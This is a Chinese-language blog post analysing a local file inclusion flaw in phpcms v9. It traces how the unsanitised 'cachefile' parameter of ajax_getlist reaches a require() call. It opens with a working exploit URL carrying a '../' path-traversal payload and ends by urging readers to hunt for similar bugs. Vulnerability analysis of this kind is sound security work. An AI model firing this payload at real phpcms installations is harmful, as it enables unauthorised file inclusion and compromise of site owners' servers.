phpcms v9本地文件包含漏洞超详细分析

作者:J0s1ph   发布:2013-04-02 14:13   分类:漏洞公布   围观:498次   发表评论   
http://www.php0day.com/api.php?op=get_menu&act=ajax_getlist&callback=alert&path=b4dboy&cachefile=../../../fuck

 

可以看出漏洞在get_menu.php文件的ajax_getlist()函数。我们跟进去看看。

 

function ajax_getlist() {

	$cachefile = $_GET['cachefile'];
	$path = $_GET['path'];
	$title = $_GET['title'];
	$key = $_GET['key'];
	$infos = getcache($cachefile,$path);
	$where_id = intval($_GET['parentid']);
	$parent_menu_name = ($where_id==0) ? '' : trim($infos[$where_id][$key]);

 

OK,看到了exp中的cachefile参数

 

$cachefile = $_GET['cachefile'];

继续跟进,看到

$infos = getcache($cachefile,$path);

 

调用了getcache()函数,

在\phpcms\libs\functions\global.func.php 文件505行

 

/**
 * 读取缓存,默认为文件缓存,不加载缓存配置。
 * @param string $name 缓存名称
 * @param $filepath 数据路径(模块名称) caches/cache_$filepath/
 * @param string $config 配置名称
 */
function getcache($name, $filepath='', $type='file', $config='') {
	pc_base::load_sys_class('cache_factory','',0);
	if($config) {
		$cacheconfig = pc_base::load_config('cache');
		$cache = cache_factory::get_instance($cacheconfig)->get_cache($config);
	} else {
		$cache = cache_factory::get_instance()->get_cache($type);
	}
	return $cache->get($name, '', '', $filepath);
}

 

OK,很清楚的可以看到传进来的$name变量,即缓存名称最终进入了$cache->get($name, ”, ”, $filepath);。
在phpcms\libs\classes\cache_file.class.php 文件的get函数

 

public function get($name, $setting = '', $type = 'data', $module = ROUTE_M) {
		$this->get_setting($setting);
		if(empty($type)) $type = 'data';
		if(empty($module)) $module = ROUTE_M;
		$filepath = CACHE_PATH.'caches_'.$module.'/caches_'.$type.'/';
		$filename = $name.$this->_setting['suf'];//echo $filepath.$filename;exit();
		if (!file_exists($filepath.$filename)) {
			return false;
		} else {
		    if($this->_setting['type'] == 'array') {
		    	$data = @require($filepath.$filename);

 

我在上面加了个echo $filepath.$filename;exit();输出了路径,如图

20130402135404_59063

很清楚了吧。例如包含的根目录的1.cache.php

20130402135417_58576

 

如果你仔细看看同类的函数,会发现还有很多类似的。慢慢挖吧。

 

 

【上一篇】
【下一篇】

您可能还会对这些文章感兴趣!

    1. H3C路由器怎么设置基于源地址的策略路由
    2. ARP攻击原理简析及防御措施
    3. 云计算巷战模式已开启,微软的杀手锏是开源
    4. 2013黑帽大会:失控 – 针对工业SCADA系统的
    5. 0day第三弹:又一个Flash严重漏洞曝光
    6. 从谷歌宕机事件认识互联网工作原理
    7. 免费开源相册Piwigo<= v2.7.1 SQL注入漏洞分析
    8. 如何利用一个周末的时间成为一名前端工程师
    9. Android平台https嗅探劫持漏洞
    10. 虚拟运营商如何做才能避免走死路?建议这样尝试
    11. 简易爬虫搜索引擎 – JSearchEngine
    12. 将web攻击数据可视化
    13. 传统安全企业发展趋势的二些看法
    14. 安全扫描器IBM Appscan v8.8
    15. nginx爆整数溢出漏洞最新情况
    16. 浅析CDN安全

phpcms v9本地文件包含漏洞超详细分析:等您发表观点!

发表评论


快捷键:Ctrl+Enter